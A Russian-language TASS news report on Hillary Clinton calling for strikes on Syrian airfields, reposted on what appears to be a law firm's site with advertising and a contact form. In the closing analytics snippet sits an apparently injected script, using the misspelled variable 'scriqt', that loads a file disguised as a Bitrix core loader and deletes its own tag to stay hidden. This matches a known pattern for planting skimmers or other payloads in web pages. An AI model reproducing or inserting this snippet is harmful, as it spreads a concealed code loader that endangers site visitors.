Хиллари Клинтон призвала Трампа вывести из строя ВВС Сирии

Хиллари Клинтон призвала Трампа вывести из строя ВВС Сирии

НЬЮ-ЙОРК, 7 апреля. /Корр. ТАСС Алексей Качалин/. Администрации президента США Дональда Трампа надо вывести из строя боевую авиацию Дамаска в назидание за предполагаемое применение химического оружия в Сирии.

Такое мнение высказала на форуме «Женщины в мире» бывший госсекретарь Хиллари Клинтон, проигравшая Трампу на всеобщих выборах в 2016 году.

«У президента Башара Асада есть Военно-воздушные силы, которые являются причиной большинства смертей мирного населения. Мы видели это долгие годы и убедились в этом снова в последние дни», — утверждала бывшая первая леди США. «Я убеждена, что нам следовало раньше и следует сейчас вывести из строя его (президента Сирии) аэродромы и таким образом помешать ему снова бомбить невинных людей и распылять на них с воздуха газ зарин», — добавила Клинтон.

«Я по-прежнему убеждена в необходимости установления (в Сирии) зон, запрещенных для пролета (боевой авиации). Нам следовало проявить больше желания противостоять Асаду», — сказала она.

Как сообщил в четверг телеканал CBS со ссылкой на свои источники, глава Пентагона Джеймс Мэттис предложит президенту США Дональду Трампу нанести удар крылатыми ракетами по Сирии с кораблей ВМС США в ответ на предполагаемую химическую атаку в провинции Идлиб. По данным газеты Washington Post, целью ракетных ударов могут стать объекты минобороны Сирии. Источники издания в вашингтонской администрации утверждают, что Мэттис, госсекретарь Рекс Тиллерсон и помощник президента по национальной безопасности Герберт Макмастер разбирали этот вопрос на встрече, которая продлилась с вечера среды до раннего утра четверга.
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');